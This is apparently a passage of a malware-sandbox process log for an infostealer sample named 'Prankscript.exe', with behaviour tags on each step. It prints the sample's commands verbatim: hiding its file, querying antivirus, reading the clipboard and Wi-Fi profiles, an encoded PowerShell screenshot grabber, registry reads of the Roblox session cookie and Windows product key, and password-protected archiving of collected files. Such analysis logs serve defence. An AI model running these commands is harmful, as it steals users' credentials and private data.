        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        7⤵
        
        PID:3692
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
        7⤵
        
        PID:3372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
        7⤵
        
        PID:908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
        7⤵
        
        PID:1872
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
        7⤵
        
        PID:1660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
        7⤵
        
        PID:4944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4664 /prefetch:8
        7⤵
        
        PID:1124
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
        7⤵
        
        PID:5952
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6764 /prefetch:8
        7⤵
        
        PID:5924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6764 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
        7⤵
        
        PID:864
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:1
        7⤵
        
        PID:6132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
        7⤵
        
        PID:5500
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
        7⤵
        
        PID:5536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,17097989423893593507,16267617262859465511,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2036 /prefetch:8
        7⤵
        
        PID:5256
      - C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        6⤵
        
        PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2204
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
      4⤵
      Views/modifies file attributes
      PID:2560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:60
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1712
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4272
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2336
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1280
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4624
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1352
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3260
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fim3rsne\fim3rsne.cmdline"
        5⤵
        
        PID:4504
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6DA.tmp" "c:\Users\Admin\AppData\Local\Temp\fim3rsne\CSC56B59D90C8BC4E429A9A2C68E5295211.TMP"
        6⤵
        
        PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3188
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4272
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1564
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:320
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4796
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1036
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34802\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\FA4bc.zip" *"
    3⤵
    PID:1536
  - - C:\Users\Admin\AppData\Local\Temp\_MEI34802\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI34802\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\FA4bc.zip" *
      4⤵
      Executes dropped EXE
      PID:1292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
